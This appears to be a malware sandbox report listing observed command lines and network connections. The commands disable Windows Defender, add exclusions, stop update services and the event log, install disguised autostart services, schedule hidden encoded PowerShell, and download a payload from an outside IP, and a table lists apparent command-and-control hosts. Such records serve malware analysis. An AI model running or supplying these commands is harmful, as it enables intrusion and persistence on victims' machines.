C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WSNKISKT"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WSNKISKT"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "taskmgr" /tr "C:\ProgramData\taskmgr.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:32
C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:32
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:64
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:32
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:64
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gnTzMngUw" /SC once /ST 12:21:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gnTzMngUw"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\ssa.vbs"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gnTzMngUw"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $webClient = New-Object System.Net.WebClient; $webClient.Credentials = New-Object System.Net.NetworkCredential('dd', 'mn...123456'); $webClient.DownloadFile('http://193.222.96.193:81/besho/besho.mp4', 'C:\Users\Public\Documents\max3d.zip'); Expand-Archive -Path 'C:\Users\Public\Documents\max3d.zip' -DestinationPath 'C:\Users\Public\Documents\' -Force
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
"C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 05:27:04 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\AZMvnFN.exe\" GH /nStSdidNk 385118 /S" /V1 /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "XyyyteIMwZeutaZuw"
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
"C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\AZMvnFN.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\AZMvnFN.exe GH /nStSdidNk 385118 /S
Network
| Country | Destination | Domain | Proto |
| RU | 5.42.96.141:80 | 5.42.96.141 | tcp |
| RU | 5.42.96.7:80 | 5.42.96.7 | tcp |
| US | 8.8.8.8:53 | 141.96.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.96.42.5.in-addr.arpa | udp |
| RU | 5.42.96.7:80 | 5.42.96.7 | tcp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | zippyfinickysofwps.shop | udp |
| US | 104.21.39.216:443 | zippyfinickysofwps.shop | tcp |
| US | 8.8.8.8:53 | 216.39.21.104.in-addr.arpa | udp |
| DE | 185.172.128.33:8970 | tcp | |
| US | 8.8.8.8:53 | acceptabledcooeprs.shop | udp |
| RU | 77.221.151.47:80 | 77.221.151.47 | tcp |
| US | 188.114.96.2:443 | acceptabledcooeprs.shop | tcp |
| RU | 185.215.113.67:26260 | tcp | |
| US | 8.8.8.8:53 | obsceneclassyjuwks.shop | udp |
| US | 188.114.96.2:443 | obsceneclassyjuwks.shop | tcp |
| US | 8.8.8.8:53 | 33.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.96.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.151.221.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | miniaturefinerninewjs.shop | udp |
| US | 104.21.30.191:443 | miniaturefinerninewjs.shop | tcp |
| US | 8.8.8.8:53 | 67.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | plaintediousidowsko.shop | udp |
| US | 172.67.213.139:443 | plaintediousidowsko.shop | tcp |
| US | 8.8.8.8:53 | sweetsquarediaslw.shop | udp |
| US | 104.21.44.201:443 | sweetsquarediaslw.shop | tcp |
| US | 8.8.8.8:53 | holicisticscrarws.shop | udp |
